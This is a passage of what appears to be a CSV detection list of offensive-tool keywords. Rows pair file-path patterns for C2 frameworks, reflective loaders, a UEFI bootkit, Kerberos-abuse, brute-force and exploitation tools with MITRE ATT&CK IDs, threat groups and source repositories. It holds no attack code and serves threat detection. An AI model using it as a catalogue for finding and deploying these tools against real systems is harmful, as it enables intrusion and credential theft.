T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*/BokuLoader/*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*/BooExecutor.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*/bootkit-rs*,offensive_tool_keyword,bootkit-rs,Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus),T1542.004 - T1067.002 - T1012 - T1053.005 - T1057,TA0002 - TA0040 - TA0003 - TA0001,N/A,N/A,Defense Evasion,https://github.com/memN0ps/bootkit-rs,1,1,N/A,N/A,5,448,54,2023-09-12T07:23:15Z,2023-04-11T03:53:15Z -*/bq1iFEP2/assert/dll/*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*/bq1iFEP2/assert/exe/*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*/BRC4_rar,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/breg.x64.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,1,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*/breg.x86.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,1,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*/broadcast-ataoe-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-avahi-dos.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-bjnp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-db2-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-dhcp6-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-dhcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-dns-service-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-dropbox-listener.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-eigrp-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-hid-discoveryd.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-igmp-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-jenkins-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-listener.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-ms-sql-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-netbios-master-browser.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-networker-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-novell-locate.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-ospf2-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-pc-anywhere.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-pc-duo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-pim-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-ping.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-pppoe-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-rip-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-ripng-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-sonicwall-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-sybase-asa-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-tellstick-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-upnp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-versant-locate.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-wake-on-lan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-wpad-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-wsdd-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-xdmcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Bropper.git*,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,1,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -*/bropper.py*,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,1,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -*/Browser-C2*,offensive_tool_keyword,Browser-C2,Post Exploitation agent which uses a browser to do C2 operations.,T1105 - T1043 - T1102,TA0003 - TA0005 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/Browser-C2,1,1,N/A,10,10,99,32,2018-05-25T15:12:21Z,2018-05-22T14:33:24Z -*/Brute/BruteStager*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/bruteforce.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/Bruteforcer.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*/bruteratel*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/BruteSploit*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,1,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -*/brutespray/*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/BruteStager.cs*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/BucketLoot.git*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - 